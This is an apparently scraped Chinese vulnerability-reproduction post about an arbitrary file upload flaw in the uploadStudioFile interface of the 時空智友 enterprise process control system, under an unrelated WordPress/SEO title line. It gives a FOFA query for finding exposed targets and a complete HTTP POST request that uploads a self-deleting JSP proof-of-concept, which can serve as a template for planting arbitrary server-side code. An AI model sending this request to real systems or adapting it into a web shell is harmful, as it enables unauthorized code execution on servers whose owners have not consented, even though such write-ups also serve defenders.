wordpress下載seo含義
免責(zé)聲明:請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無(wú)關(guān)。該文章僅供學(xué)習(xí)用途使用。
1. 時(shí)空智友企業(yè)流程化管控系統(tǒng)簡(jiǎn)介
微信公眾號(hào)搜索:南風(fēng)漏洞復(fù)現(xiàn)文庫(kù) 該文章 南風(fēng)漏洞復(fù)現(xiàn)文庫(kù) 公眾號(hào)首發(fā)
時(shí)空智友企業(yè)流程化管控系統(tǒng)是一個(gè)用于企業(yè)流程管理和控制的軟件系統(tǒng)。
2.漏洞描述
時(shí)空智友企業(yè)流程化管控系統(tǒng)是一個(gè)用于企業(yè)流程管理和控制的軟件系統(tǒng)。它旨在幫助企業(yè)實(shí)現(xiàn)流程的規(guī)范化、自動(dòng)化和優(yōu)化,從而提高工作效率、降低成本并提升管理水平。時(shí)空智友企業(yè)流程化管控系統(tǒng)存在任意文件上傳漏洞,時(shí)空智友企業(yè)流程化管控系統(tǒng)uploadStudioFile接口存在任意文件上傳漏洞。
CVE編號(hào):
CNNVD編號(hào):
CNVD編號(hào):
3.影響版本
時(shí)空智友
時(shí)空智友企業(yè)流程化管控系統(tǒng)uploadStudioFile接口存在任意文件上傳漏洞
4.fofa查詢語(yǔ)句
body="login.jsp?login=null"
5.漏洞復(fù)現(xiàn)
漏洞鏈接:http://xx.xx.xx.xx/formservice?service=updater.uploadStudioFile
漏洞數(shù)據(jù)包:
POST?/formservice?service=updater.uploadStudioFile?HTTP/1.1
User-Agent:?Mozilla/4.0?(compatible;?MSIE?8.0;?Windows?NT?6.1)
Accept-Encoding:?gzip,?deflate
Accept:?*/*
Connection:?close
Host:?xx.xx.xx.xx
Content-Length:?441
Content-Type:?application/x-www-form-urlencodedcontent=%3c%3fxml%20version%3d%221.0%22%3f%3e%3croot%3e%3cfilename%3e677433.jsp%3c%2ffilename%3e%3cfilepath%3e.%2f%3c%2ffilepath%3e%3cfilesize%3e172%3c%2ffilesize%3e%3clmtime%3e1970-01-01%2008%3a00%3a00%3c%2flmtime%3e%3c%2froot%3e%3c!--%3c%25%20out.print(%22%3cpre%3e%22)%3bout.println(3233%20*%203323)%3bout.print(%22%3c%2fpre%3e%22)%3bnew%20java.io.File(application.getRealPath(request.getServletPath())).delete()%3b%0d%0a%25%3e%0d%0a--%3e
上傳后的路徑 http://xx.xx.xx.xx/update/temp/studio/677433.jsp
7.整改意見
請(qǐng)關(guān)注廠商更新 https://www.sxskzy.com/